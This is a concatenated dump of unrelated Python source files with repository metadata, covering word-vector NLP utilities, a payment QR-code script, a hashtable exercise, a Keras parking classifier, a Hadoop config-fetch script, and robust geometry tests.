# return 1.0 - (np.dot(u, v) / (vector_length(u) * vector_length(v)))
def matching(u, v):
# The scipy implementation is for binary vectors only. This version is more general.
return np.sum(np.minimum(u, v))
def jaccard(u, v):
# The scipy implementation is for binary vectors only. This version is more general.
return 1.0 - (matching(u, v) / np.sum(np.maximum(u, v)))
def neighbors(word=None, mat=None, rownames=None, distfunc=cosine):
if word not in rownames:
raise ValueError('%s is not in this VSM' % word)
w = mat[rownames.index(word)]
dists = [(rownames[i], distfunc(w, mat[i])) for i in xrange(len(mat))]
return sorted(dists, key=itemgetter(1), reverse=False)
######################################################################
# Reweighting
def prob_norm(u):
return u / np.sum(u)
def pmi(mat=None, rownames=None, positive=True):
"""PMI on mat; positive=True does PPMI. rownames is not used; it's
an argument only for consistency with other methods used here"""
# Joint probability table:
p = mat / np.sum(mat, axis=None)
# Pre-compute column sums:
colprobs = np.sum(p, axis=0)
# Vectorize this function so that it can be applied rowwise:
np_pmi_log = np.vectorize((lambda x : _pmi_log(x, positive=positive)))
p = np.array([np_pmi_log(row / (np.sum(row)*colprobs)) for row in p])
return (p, rownames)
def _pmi_log(x, positive=True):
"""With positive=False, return log(x) if possible, else 0.
With positive=True, log(x) is mapped to 0 where negative."""
val = 0.0
if x > 0.0:
val = np.log(x)
if positive:
val = max([val,0.0])
return val
def tfidf(mat=None, rownames=None):
"""TF-IDF on mat. rownames is unused; it's an argument only
for consistency with other methods used here"""
colsums = np.sum(mat, axis=0)
doccount = mat.shape[1]
w = np.array([_tfidf_row_func(row, colsums, doccount) for row in mat])
return (w, rownames)
def _tfidf_row_func(row, colsums, doccount):
df = float(len([x for x in row if x > 0]))
idf = 0.0
# This ensures a defined IDF value >= 0.0:
if df > 0.0 and df != doccount:
idf = np.log(doccount / df)
tfs = row/colsums
return tfs * idf
######################################################################
# Dimensionality reduction
def lsa(mat=None, rownames=None, k=100):
"""svd with a column-wise truncation to k dimensions; rownames
is passed through only for consistency with other methods"""
rowmat, singvals, colmat = svd(mat, full_matrices=False)
singvals = np.diag(singvals)
trunc = np.dot(rowmat[:, 0:k], singvals[0:k, 0:k])
return (trunc, rownames)
######################################################################
# Visualization
def tsne_viz(
mat=None,
rownames=None,
indices=None,
colors=None,
output_filename=None,
figheight=40,
figwidth=50,
display_progress=False):
"""2d plot of mat using tsne, with the points labeled by rownames,
aligned with colors (defaults to all black).
If indices is a list of indices into mat and rownames,
then it determines a subspace of mat and rownames to display.
Give output_filename a string argument to save the image to disk.
figheight and figwidth set the figure dimensions.
display_progress=True shows the information that the tsne method prints out."""
if not colors:
colors = ['black' for i in range(len(rownames))]
temp = sys.stdout
if not display_progress:
# Redirect stdout so that tsne doesn't fill the screen with its iteration info:
f = open(os.devnull, 'w')
sys.stdout = f
tsnemat = tsne(mat)
sys.stdout = temp
# Plot coordinates:
if not indices:
indices = range(len(rownames))
vocab = np.array(rownames)[indices]
xvals = tsnemat[indices, 0]
yvals = tsnemat[indices, 1]
# Plotting:
fig, ax = plt.subplots(nrows=1, ncols=1)
fig.set_figheight(40)
fig.set_figwidth(50)
ax.plot(xvals, yvals, marker='', linestyle='')
# Text labels:
for word, x, y, color in zip(vocab, xvals, yvals, colors):
ax.annotate(word, (x, y), fontsize=8, color=color)
# Output:
if output_filename:
plt.savefig(output_filename, bbox_inches='tight')
else:
plt.show()
######################################################################
# Semantic orientation method
def semantic_orientation(
mat=None,
rownames=None,
seeds1=['bad', 'nasty', 'poor', 'negative', 'unfortunate', 'wrong', 'inferior'],
seeds2=['good', 'nice', 'excellent', 'positive', 'fortunate', 'correct', 'superior'],
distfunc=cosine):
sm1 = so_seed_matrix(seeds1, mat, rownames)
sm2 = so_seed_matrix(seeds2, mat, rownames)
scores = [(rownames[i], so_row_func(mat[i], sm1, sm2, distfunc)) for i in xrange(len(mat))]
return sorted(scores, key=itemgetter(1), reverse=False)
def so_seed_matrix(seeds, mat, rownames):
indices = [rownames.index(word) for word in seeds if word in rownames]
if not indices:
raise ValueError('The matrix contains no members of the seed set: %s' % ",".join(seeds))
return mat[np.array(indices)]
def so_row_func(row, sm1, sm2, distfunc):
val1 = np.sum([distfunc(row, srow) for srow in sm1])
val2 = np.sum([distfunc(row, srow) for srow in sm2])
return val1 - val2
######################################################################
# Disambiguation
def disambiguate(mat=None, rownames=None, minval=0.0):
"""Basic unsupervised disambiguation. minval sets what it means to occur in a column"""
clustered = defaultdict(lambda : defaultdict(int))
# For each word, cluster the documents containing it:
for w_index, w in enumerate(rownames):
doc_indices = np.array([j for j in range(mat.shape[1]) if mat[w_index,j] > minval])
clust = cluster(mat, doc_indices)
for doc_index, c_index in clust:
w_sense = "%s_%s" % (w, c_index)
clustered[w_sense][doc_index] = mat[w_index, doc_index]
# Build the new matrix:
new_rownames = sorted(clustered.keys())
new_mat = np.zeros((len(new_rownames), mat.shape[1]))
for i, w in enumerate(new_rownames):
for j in clustered[w]:
new_mat[i,j] = clustered[w][j]
return (new_mat, new_rownames)
def cluster(mat, doc_indices):
X = mat[:, doc_indices].T
# Other clustering algorithms can easily be swapped in:
# http://scikit-learn.org/stable/modules/classes.html#module-sklearn.cluster
clust = AffinityPropagation()
clust.fit(X)
return zip(doc_indices, clust.labels_)
######################################################################
# GloVe word representations
def randmatrix(m, n, lower=-0.5, upper=0.5):
"""Creates an m x n matrix of random values in [lower, upper]"""
return np.array([random.uniform(lower, upper) for i in range(m*n)]).reshape(m, n)
def glove(
mat=None, rownames=None,
n=100, xmax=100, alpha=0.75,
iterations=100, learning_rate=0.05,
display_progress=False):
"""Basic GloVe. rownames is passed through unused for compatibility
with other methods. n sets the dimensionality of the output vectors.
xmax and alpha controls the weighting function (see the paper, eq. (9)).
iterations and learning_rate control the SGD training.
display_progress=True prints iterations and current error to stdout."""
m = mat.shape[0]
W = randmatrix(m, n) # Word weights.
C = randmatrix(m, n) # Context weights.
B = randmatrix(2, m) # Word and context biases.
indices = range(m)
for iteration in range(iterations):
error = 0.0
random.shuffle(indices)
for i, j in itertools.product(indices, indices):
if mat[i,j] > 0.0:
# Weighting function from eq. (9)
weight = (mat[i,j] / xmax)**alpha if mat[i,j] < xmax else 1.0
# Cost is J' based on eq. (8) in the paper:
diff = np.dot(W[i], C[j]) + B[0,i] + B[1,j] - np.log(mat[i,j])
fdiff = diff * weight
# Gradients:
wgrad = fdiff * C[j]
cgrad = fdiff * W[i]
wbgrad = fdiff
wcgrad = fdiff
# Updates:
W[i] -= (learning_rate * wgrad)
C[j] -= (learning_rate * cgrad)
B[0,i] -= (learning_rate * wbgrad)
B[1,j] -= (learning_rate * wcgrad)
# One-half squared error term:
error += 0.5 * weight * (diff**2)
if display_progress:
print "iteration %s: error %s" % (iteration, error)
# Return the sum of the word and context matrices, per the advice
# in section 4.2:
return (W + C, rownames)
def glove_viz(mat=None, rownames=None, word_count=1000, iterations=10, n=50, display_progress=True):
glove_indices = random.sample(range(len(rownames)), word_count)
glovemat, _ = glove(mat=mat[glove_indices, :], iterations=iterations, n=n)
tsne_viz(mat=glovemat, rownames=np.array(rownames)[glove_indices])
######################################################################
# Shallow neural networks
from numpy import dot, outer
class ShallowNeuralNetwork:
def __init__(self, input_dim=0, hidden_dim=0, output_dim=0, afunc=np.tanh, d_afunc=(lambda z : 1.0 - z**2)):
self.afunc = afunc
self.d_afunc = d_afunc
self.input = np.ones(input_dim+1) # +1 for the bias
self.hidden = np.ones(hidden_dim+1) # +1 for the bias
self.output = np.ones(output_dim)
self.iweights = randmatrix(input_dim+1, hidden_dim)
self.oweights = randmatrix(hidden_dim+1, output_dim)
self.oerr = np.zeros(output_dim)
self.ierr = np.zeros(input_dim+1)
def forward_propagation(self, ex):
self.input[ : -1] = ex # ignore the bias
self.hidden[ : -1] = self.afunc(dot(self.input, self.iweights)) # ignore the bias
self.output = self.afunc(dot(self.hidden, self.oweights))
return copy.deepcopy(self.output)
def backward_propagation(self, labels, alpha=0.5):
labels = np.array(labels)
self.oerr = (labels-self.output) * self.d_afunc(self.output)
herr = dot(self.oerr, self.oweights.T) * self.d_afunc(self.hidden)
self.oweights += alpha * outer(self.hidden, self.oerr)
self.iweights += alpha * outer(self.input, herr[:-1]) # ignore the bias
return np.sum(0.5 * (labels-self.output)**2)
def train(self, training_data, maxiter=5000, alpha=0.05, epsilon=1.5e-8, display_progress=False):
iteration = 0
error = sys.float_info.max
while error > epsilon and iteration < maxiter:
error = 0.0
random.shuffle(training_data)
for ex, labels in training_data:
self.forward_propagation(ex)
error += self.backward_propagation(labels, alpha=alpha)
if display_progress:
print '\rcompleted iteration %s; error is %s' % (iteration, error),
sys.stdout.flush()
iteration += 1
if display_progress:
print ""
def predict(self, ex):
self.forward_propagation(ex)
return copy.deepcopy(self.output)
def hidden_representation(self, ex):
self.forward_propagation(ex)
return self.hidden
def read_valence_arousal_dominance_lexicon(src_filename='distributedwordreps-data/Warriner_et_al emot ratings.csv'):
rescaler = (lambda x : np.tanh(float(x)-5))
lex = {}
for d in csv.DictReader(file(src_filename)):
vals = {'valence': rescaler(d['V.Mean.Sum']),
'arousal': rescaler(d['A.Mean.Sum']),
'dominance': rescaler(d['D.Mean.Sum'])}
lex[d['Word']] = vals
return lex
def build_supervised_dataset(mat=None, rownames=None, lex=None):
data = []
vocab = []
for word, vals in lex.items():
if word in rownames:
vocab.append(word)
data.append((mat[rownames.index(word)], [y for _, y in sorted(vals.items())]))
return (data, vocab)
def sentiment_lexicon_example(
mat=None,
rownames=None,
hidden_dim=100,
maxiter=1000,
output_filename=None,
display_progress=False):
# Get the lexicon:
lex = read_valence_arousal_dominance_lexicon()
# Build the training data:
sentidata, sentivocab = build_supervised_dataset(mat=mat, rownames=rownames, lex=lex)
# Set up the network:
sentinet = ShallowNeuralNetwork(input_dim=len(sentidata[0][0]), hidden_dim=hidden_dim, output_dim=len(sentidata[0][1]))
# Train the network:
sentinet.train(copy.deepcopy(sentidata), maxiter=maxiter, display_progress=display_progress)
# Build the new matrix of hidden representations:
inputs, labels = zip(*sentidata)
sentihidden = np.array([sentinet.hidden_representation(x) for x in inputs])
# Visualize the results with t-SNE:
def colormap(vals):
"""Simple way to distinguish the 2x2x2 possible labels -- could be done much better!"""
signs = ['CC' if x < 0.0 else '00' for _, x in sorted(vals.items())]
return "#" + "".join(signs)
colors = [colormap(lex[word]) for word in sentivocab]
tsne_viz(mat=sentihidden, rownames=sentivocab, colors=colors, display_progress=display_progress, output_filename=output_filename)
######################################################################
# Word similarity task
def word_similarity_evaluation(src_filename="distributedwordreps-data/wordsim353/combined.csv",
mat=None, rownames=None, distfunc=cosine):
# Read in the data:
reader = csv.DictReader(file(src_filename))
sims = defaultdict(list)
vocab = set([])
for d in reader:
w1 = d['Word 1']
w2 = d['Word 2']
if w1 in rownames and w2 in rownames:
# Use negative of scores to align intuitively with distance functions:
sims[w1].append((w2, -float(d['Human (mean)'])))
sims[w2].append((w1, -float(d['Human (mean)'])))
vocab.add(w1)
vocab.add(w2)
# Evaluate the matrix by creating a vector of all_scores for the wordsim353 data
# and all_dists for mat's distances.
all_scores = []
all_dists = []
for word in vocab:
vec = mat[rownames.index(word)]
vals = sims[word]
cmps, scores = zip(*vals)
all_scores += scores
all_dists += [distfunc(vec, mat[rownames.index(w)]) for w in cmps]
# Return just the rank correlation coefficient (index [1] would be the p-value):
return scipy.stats.spearmanr(all_scores, all_dists)[0]
######################################################################
# Analogy completion task
def analogy_completion(a, b, c, mat=None, rownames=None, distfunc=cosine):
"""a is to be as c is to predicted, where predicted is the closest to (b-a) + c"""
for x in (a, b, c):
if x not in rownames:
raise ValueError('%s is not in this VSM' % x)
avec = mat[rownames.index(a)]
bvec = mat[rownames.index(b)]
cvec = mat[rownames.index(c)]
newvec = (bvec - avec) + cvec
dists = [(w, distfunc(newvec, mat[i])) for i, w in enumerate(rownames) if w not in (a, b, c)]
return sorted(dists, key=itemgetter(1), reverse=False)
def analogy_evaluation(src_filename="distributedwordreps-data/question-data/gram1-adjective-to-adverb.txt",
mat=None, rownames=None, distfunc=cosine):
# Read in the data and restrict to problems we can solve:
data = [line.split() for line in open(src_filename).read().splitlines()]
data = [prob for prob in data if set(prob) <= set(rownames)]
# Run the evaluation, collecting accuracy and rankings:
results = defaultdict(int)
ranks = []
for a, b, c, d in data:
predicted = analogy_completion(a, b, c, mat=mat, rownames=rownames, distfunc=distfunc)
# print "%s is to %s as %s is to %s (actual is %s)" % (a, b, c, predicted, d)
results[predicted[0][0] == d] += 1
predicted_words, _ = zip(*predicted)
ranks.append(predicted_words.index(d))
# Return the mean reciprocal rank and the accuracy results:
mrr = np.mean(1.0/(np.array(ranks)+1))
return (mrr, results)
| [
"ciyang@server.fake"
] | ciyang@server.fake |
d4fb2ee822d6c453cf42ce98fa23843e9c9ea94a | 9b4b506bb062564f0016162f9862ea1d111aa94c | /api2.py | 5bab8bb301ab0f184d17ccbc24a7805a41e74b01 | [] | no_license | Tanay-27/paymentapi | 6a95a464583ec35004315f672658073bf53d249b | 356de0339112cc7d178dd4de1d38eda327ab5055 | refs/heads/master | 2022-11-06T22:56:38.298434 | 2020-07-13T15:06:21 | 2020-07-13T15:06:21 | 278,343,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | #from PIL import Image
from final_year.instamojoapi.api1 import createPayment
import qrcode
# Enter amount and purpose,
# in deployment stage this will be automated
#amt = float(input('Enter Amount: '))
#pur = input('Enter Purpose: ')
def qrshow(pur,amt):
amt = 25
pur = "Med"
# calling the createPayment function
url = createPayment(pur,amt)
# setting advanced parameters for QR code customisation
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=10,
border=4,
)
# adding the URL for Payment request
qr.add_data(url)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
# displaying image on screen, further work on this is expected
img.show()
return url | [
"tanayshah@live.com"
] | tanayshah@live.com |
3aff2aaf8f1acb9ba1cecfd827833d7465f5f848 | 23a3d0433bd53f1fd69a8397ee310913038980ea | /06_lesson_5/quiz/lookup.py | 33ace1d20503a122122d5fbb675fc5140599ec69 | [] | no_license | lisalisadong/cs-101 | 3ce2f151386a153770de266624f47879f7796fd3 | 6a001aa27100ce76e7dfa5e6a3528607d3280121 | refs/heads/master | 2020-05-19T23:00:25.857863 | 2015-01-06T06:24:01 | 2015-01-06T06:24:01 | 26,845,527 | 16 | 15 | null | null | null | null | UTF-8 | Python | false | false | 1,094 | py | # Define a procedure,
# hashtable_lookup(htable,key)
# that takes two inputs, a hashtable
# and a key (string),
# and returns the value associated
# with that key.
def hashtable_lookup(htable,key):
for e in hashtable_get_bucket(htable,key):
if e[0] == key:
return e[1]
return None
def hashtable_add(htable,key,value):
bucket = hashtable_get_bucket(htable,key)
bucket.append([key,value])
def hashtable_get_bucket(htable,keyword):
return htable[hash_string(keyword,len(htable))]
def hash_string(keyword,buckets):
out = 0
for s in keyword:
out = (out + ord(s)) % buckets
return out
def make_hashtable(nbuckets):
table = []
for unused in range(0,nbuckets):
table.append([])
return table
table = [[['Ellis', 11], ['Francis', 13]], [], [['Bill', 17], ['Zoe', 14]],
[['Coach', 4]], [['Louis', 29], ['Nick', 2], ['Rochelle', 4]]]
print hashtable_lookup(table, 'Francis')
#>>> 13
print hashtable_lookup(table, 'Louis')
#>>> 29
print hashtable_lookup(table, 'Zoe')
#>>> 14
print hashtable_lookup(table, 'Lisa')
| [
"qingxiao.dong@gmail.com"
] | qingxiao.dong@gmail.com |
00e7ce19129243ed2830a59721ab18112af72986 | aad5204456789f32db0e7b63b668910a508e59cf | /carapp/test.py | 718cdcbd8ec6f1047527d922e34f7beb02f22075 | [] | no_license | pc660/CarApp | bc08969d235176b97a2d9f925d463a34e36ebfa6 | 9f3d8a5ec44f70fed9468b3e6fa3bd5079a2e438 | refs/heads/master | 2021-01-10T05:25:11.223926 | 2015-06-18T18:44:35 | 2015-06-18T18:44:35 | 36,813,715 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from prototype.models import *
from prototype.views import *
# Create user
user = User(username="test1@gmail.com")
user.set_password("111")
user.save()
appuser = AppUser.objects.create(user=user, usertype="0", state="ca", city="mv",
address="home")
appuser.save()
# Create token
token = Token(username="test1@gmail.com", token="1")
token.save()
# Create Car
car1 = Car(user=user, model="audi", brand="a4", state="ca", city="mv",
year="1991", price="100", color="black", title="manimabi", miles="123",
description="bbb", tag1=True, tag2=True)
car1.save()
car2 = Car(user=user, model="BWM", brand="s5", state="ca", city="sj",
year="1991", price="100", color="black", title="manimabi", miles="123",
description="bbb", tag1=True, tag3=True)
car2.save()
car3 = Car(user=user, model="tesla", brand="S", state="ca", city="sf",
year="1991", price="100", color="black", title="manimabi", miles="123",
description="bbb", tag1=True, tag4=True)
car3.save()
| [
"pc660@hotmail.com"
] | pc660@hotmail.com |
00a8bb3132b8b95eef7a93ce9774764910f2044c | 7aefa20b27474e66e3815d99863c3ee0d8b7a5d0 | /18.1.py | 5e8b53b0d45bae893462f37eac89443824a29d06 | [] | no_license | Christine1225/Leetcode_py3 | 47a16837b3c7b0677a5c40990d4121a906f9833b | 34e10eaf1ec32bc928acb9fa28659c28626a9564 | refs/heads/master | 2020-03-24T17:33:23.510234 | 2019-03-06T09:26:46 | 2019-03-06T09:26:46 | 142,863,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,700 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 14:13:04 2018
@author: Abigail
"""
class Solution:
def find_n_sum(self, sorted_nums, target, n, result_prefix, results):
nums_len = len(sorted_nums)
if n > nums_len:
return -1
## as sorted_nums is a sorted list, we can simplify some special conditions
if (target < sorted_nums[0] * n) or (target > sorted_nums[-1] * n):
return -2
if n == 1:
for num in sorted_nums:
if num == target:
results.append([num])
return 0
return -2
elif n == 2:
## find 2 elements in list whose sum is target
idx_l, idx_r = 0, nums_len - 1
while idx_l < idx_r:
element_sum = sorted_nums[idx_l] + sorted_nums[idx_r]
if element_sum < target:
idx_l += 1
elif element_sum > target:
idx_r -= 1
else:
## a 2-element tuple is found
## add this solution into results list
aux = result_prefix + [sorted_nums[idx_l], sorted_nums[idx_r]]
results.append(aux)
idx_l += 1
idx_r -= 1
## to pass duplicate elements in list
while (idx_l < idx_r) & (sorted_nums[idx_l] == sorted_nums[idx_l - 1]):
idx_l += 1
while (idx_l < idx_r) & (sorted_nums[idx_r] == sorted_nums[idx_r + 1]):
idx_r -= 1
return 0
else:
## Try the SMALLEST element sorted_nums[i] in the n-tuple
## and find the other (n-1)-tuple in remaining list sorted_nums[i+1:]
for i in range(0, len(sorted_nums) - n + 1):
if sorted_nums[i] * n > target:
break
elif (i > 0) & (sorted_nums[i] == sorted_nums[i-1]):
pass
else:
self.find_n_sum(sorted_nums[i + 1:],
target - sorted_nums[i],
n - 1,
result_prefix+[sorted_nums[i]],
results)
def fourSum(self, nums, target):
sorted_nums = sorted(nums)
results = []
self.find_n_sum(sorted_nums, target=target, n=4, result_prefix=[], results=results)
return results
ss = Solution()
nums = [1, 0, -1, 0, -2, 2]
target= 0
print(ss.fourSum(nums,target)) | [
"zhuyu@megvii.com"
] | zhuyu@megvii.com |
b16fc1d508f96b92a9f454b018a0454764142397 | e86e81152d2c10135cb283d979e53682bcf18182 | /Code/train_parking.py | 1903d46a85f2698768a7837b9816fbf89cbe4f94 | [] | no_license | hachemmosbah/StageCerema | 10ef433492478b7b66b08bd763eae7e45789b455 | 92a84bca44dba6f5c8c35ecb9d963ee7c57eb32d | refs/heads/master | 2023-05-01T18:16:11.573322 | 2021-05-18T15:28:59 | 2021-05-18T15:28:59 | 245,976,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Dense, Activation, Dropout, Flatten
from keras import optimizers
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
from matplotlib import pyplot as plt
# In[2]:
# étape1: charger les données
img_width = 150
img_height = 150
# In[3]:
DATA_train = "/Users/mosbahhachem/Documents/git/StageCerema/code/data/train"
DATA_valid = "/Users/mosbahhachem/Documents/git/StageCerema/code/data/valid"
# In[4]:
datagen = ImageDataGenerator(rescale = 1./255)
# In[5]:
train_generator = datagen.flow_from_directory(directory=DATA_train,target_size=(img_width,img_height),
classes=['parking','non_parking'],class_mode='binary',batch_size=32)
# In[6]:
validation_generator = datagen.flow_from_directory(directory=DATA_valid,target_size=(img_width,img_height),
classes=['parking','non_parking'], class_mode='binary',batch_size=16)
# In[7]:
model =Sequential()
model.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))
#model.add(BatchNormalization())
model.add(Activation('elu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.5))
model.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))
#model.add(BatchNormalization())
model.add(Activation('elu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(100))
model.add(Activation('elu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
print('model compler!!')
print('train start....')
training = model.fit_generator(generator=train_generator, steps_per_epoch=5000 // 16,epochs=15
,validation_data=validation_generator,validation_steps=832//16)
print('training finished!!')
print('sauvgarde parking_non_parking_test.h5')
# saisir le chemin où seront stockés les poids et modèle du modèle qui vient d'être entraîné
model.save_weights('/Users/mosbahhachem/Documents/git/StageCerema/code/model/parking_non_parking.h5')
model.save('/Users/mosbahhachem/Documents/git/StageCerema/code/model/parking_non_parking.model')
print('Toutes les sauvgardes avec succées !!')
# In[8]:
# summarize history for accuracy
plt.plot(training.history['accuracy'])
plt.plot(training.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# summarize history for loss
plt.plot(training.history['loss'])
plt.plot(training.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# In[ ]:
# In[ ]:
| [
"hachem.mosbah.data@gmail.com"
] | hachem.mosbah.data@gmail.com |
0bc17732fcd3b35824193d0f5e0fde73fd55f3b0 | 308342069e63736d3d1f56f914a6122d06efee0d | /shell/get_plan_conf.py | cbcd0aa70555c6c2448cae981d5931c49827ea58 | [] | no_license | sengeiou/effect_platform | 1876d78fe06b664f439df57750b5e043b634c976 | 2186ad4993c988dac035771ea6af34e34c7f4abe | refs/heads/master | 2021-06-03T13:29:48.531514 | 2016-08-03T05:57:00 | 2016-08-03T05:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,144 | py | #!/usr/bin/env python
# -*- encoding:utf-8 -*-
'''
从admin_host获取配置文件列表,保存到本地
'''
import os
import sys
from os import path
import optparse
from datetime import datetime
from datetime import timedelta
from ep_config import *
# 全局变量
def get_options():
'''解析程序执行传入的参数
'''
p = optparse.OptionParser(usage="usage: %prog [-d]", version="1.0")
p.add_option('-v', '--get-version', dest='getVersion', default=False, action='store_true', help='Get version number of plugin')
p.add_option('-d', action='store', type='string', dest='ydate', default=(datetime.today()-timedelta(days=1)).strftime('%Y%m%d'), help='thedate, %Y%m%d')
options, arguments = p.parse_args()
try:
ydate = datetime.strptime(options.ydate, '%Y%m%d')
except:
print "ERROR: 参数日期错误"
return ydate
def get_remote_files(ydate):
'''
从admin_host机器获取用户当天新增加的计划配置文件到本地的临时目录
'''
if not path.exists(local_temp_path) :
os.makedirs(local_temp_path)
conf = {
'YYYY' : ydate.strftime('%Y') ,
'MM' : ydate.strftime('%m') ,
'DD' : ydate.strftime('%d') ,
}
cmd = "%s %s:%s/* %s" % (ssh_cmd, admin_host, remote_path % conf, local_temp_path)
print cmd
os_rt = os.system(cmd)
if os_rt != 0:
print "ERROR: %s" % cmd
return os_rt
def parse_file(file_name):
'''
分析本地临时文件目录中的计划配置文件,根据 计算归属有效周期(period), 路径树差分规则(tree_split) 属性放到不同的目录中
'''
return '11', 'none'
def move_local_file(period, tree_split, file_name):
'''
从temp目录转移本地文件到其他目录
'''
conf = {'PERIOD':period, 'TREE_SPLIT':tree_split, }
local_file_path = local_path % conf;
if not path.exists(local_file_path) :
os.makedirs(local_file_path)
os.rename(path.join(local_temp_path, file_name), path.join(local_file_path, file_name))
return 0
def put_file_to_hadoop(period, tree_split, file_name):
'''
把本地文件put到云梯上
'''
conf = {'PERIOD':period, 'TREE_SPLIT':tree_split}
h_conf = {'local_path':local_path % conf, 'hadoop_path':hadoop_path % conf, 'hadoop_cmd':hadoop_cmd, 'file_name':file_name}
cmd = '''
%(hadoop_cmd)s dfs -rm %(hadoop_path)s/%(file_name)s
%(hadoop_cmd)s dfs -put %(local_path)s/%(file_name)s %(hadoop_path)s/%(file_name)s''' % h_conf
print cmd
os_rt = os.system(cmd)
if os_rt != 0:
print "ERROR: %s" % cmd
return os_rt
def main():
ydate = get_options()
if ( get_remote_files(ydate) != 0 ):
return -1
for file_name in os.listdir(local_temp_path):
period, tree_split = parse_file(file_name)
if ( move_local_file(period, tree_split, file_name) != 0 ):
return -1
if ( put_file_to_hadoop(period, tree_split, file_name) != 0 ):
return -1
pass
if __name__ == '__main__':
sys.exit(main())
| [
"sav2008@gmail.com"
] | sav2008@gmail.com |
1af1d409b84f3dccc002b5fbea7fb658f5c0cdd1 | 3011847d0c09a414250df6208005921da28b3d36 | /pavement.py | ec63ffe1790a4cf8e2f781392005cf1f1fad7871 | [
"MIT"
] | permissive | ihtwang/Bank | 51530a1e8c7e44ae556a8ee054da0a0e42230f01 | e97e23b30a3fead16dfbfb35e60f528ec060131b | refs/heads/master | 2021-08-31T03:48:24.479844 | 2017-12-20T08:36:44 | 2017-12-20T08:36:44 | 114,862,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | from paver.tasks import task, BuildFailure
from paver.easy import sh,needs
@task
def unit_tests():
sh('nosetests --with-coverage test/unit')
@task
def lettuce_tests():
sh('lettuce test/bdd')
@task
def run_pylint():
try:
sh('pylint --msg-template="{path}:{line}: \
[{msg_id}({symbol}), {obj}] {msg}" bank/ > pylint.txt')
except BuildFailure:
pass
@needs('unit_tests', 'lettuce_tests', 'run_pylint')
@task
def default():
pass
| [
"iht_wang@126.com"
] | iht_wang@126.com |
638eacd3d24e97292b989c4546def4130f7fc519 | 5ead4735845e6e4488a1825c903cebda2b963f71 | /seg_intersection_test.py | 501c3ca2dc9b8f9f4fe6c344d895a898853a70f4 | [] | no_license | intdxdt/robustpy | b734d883a57f268c76197f3d365bf406e1709580 | 784ab76534ad54c5eb3a6f98abeabbd6bd017e48 | refs/heads/master | 2020-12-03T02:31:51.847738 | 2017-10-15T05:24:49 | 2017-10-15T05:24:49 | 95,951,361 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | import unittest
from det import det2
from random import random
from rsum import robust_sum as rsum
from compare import robust_compare as cmp
from rprod import robust_product as rprod
from subtract import robust_subtract as rsub
from validate import validate_sequence as validate
from seg_intersection import segment_intersection as seg_intersection
def rnd():
return random()
class TestRobustSegIntersection(unittest.TestCase):
def test_seg_intersect(self):
# | a[0] a[1] 1 |
# | b[0] b[1] 1 |
# | x y w |
def test_pt_seq(a, b, x, y, w):
d0 = rsum([a[1]], [-b[1]])
d1 = rsum([a[0]], [-b[0]])
d2 = det2([[a[0], a[1]], [b[0], b[1]]])
# validate det.RobustDet2
self.assertTrue(validate(d2))
p0 = rprod(x, d0)
p1 = rprod(y, d1)
p2 = rprod(w, d2)
# validate p0
self.assertTrue(validate(p0))
# validate p1
self.assertTrue(validate(p1))
# validate p2
self.assertTrue(validate(p2))
s = rsum(rsub(p0, p1), p2)
# validate s
self.assertTrue(validate(s))
# check point on line
self.assertTrue(cmp(s, (0.,)) == 0.)
def verify(a, b, c, d):
x = seg_intersection(a, b, c, d)
# validate x
self.assertTrue(validate(x[0]))
# validate y
self.assertTrue(validate(x[1]))
# validate w
self.assertTrue(validate(x[2]))
test_pt_seq(a, b, x[0], x[1], x[2])
test_pt_seq(c, d, x[0], x[1], x[2])
p = ((a, b), (c, d))
for s in range(0, 2):
for r in range(0, 2):
for h in range(0, 2):
y = seg_intersection(p[h][s], p[h][s ^ 1], p[h ^ 1][r], p[h ^ 1][r ^ 1])
# validate x
self.assertTrue(validate(y[0]))
# validate y
self.assertTrue(validate(y[1]))
# validate w
self.assertTrue(validate(y[2]))
# check x
self.assertTrue(cmp(rprod(y[0], x[2]), rprod(x[0], y[2])) == 0.)
# check y
self.assertTrue(cmp(rprod(y[1], x[2]), rprod(x[1], y[2])) == 0.)
for _ in range(0, 100):
verify((rnd(), rnd()), (rnd(), rnd()), (rnd(), rnd()), (rnd(), rnd()))
isect = seg_intersection((-1., 10.), (-10., 1.), (10., 0.), (10., 10.))
# no intersections
self.assertTrue(isect[2][0] == 0.)
suite = unittest.TestLoader().loadTestsFromTestCase(TestRobustSegIntersection)
unittest.TextTestRunner(verbosity=4).run(suite)
| [
"titus.intdxdt@gmail.com"
] | titus.intdxdt@gmail.com |
19b844921393bc5dad52f8d3e705076a194fd0d0 | d11d4907936ddf1ae2ab37385278295cad8f06e0 | /test/functional/feature_logging.py | 1cf30016a7c5233b2696c72ca8acfd75c85d521e | [
"MIT"
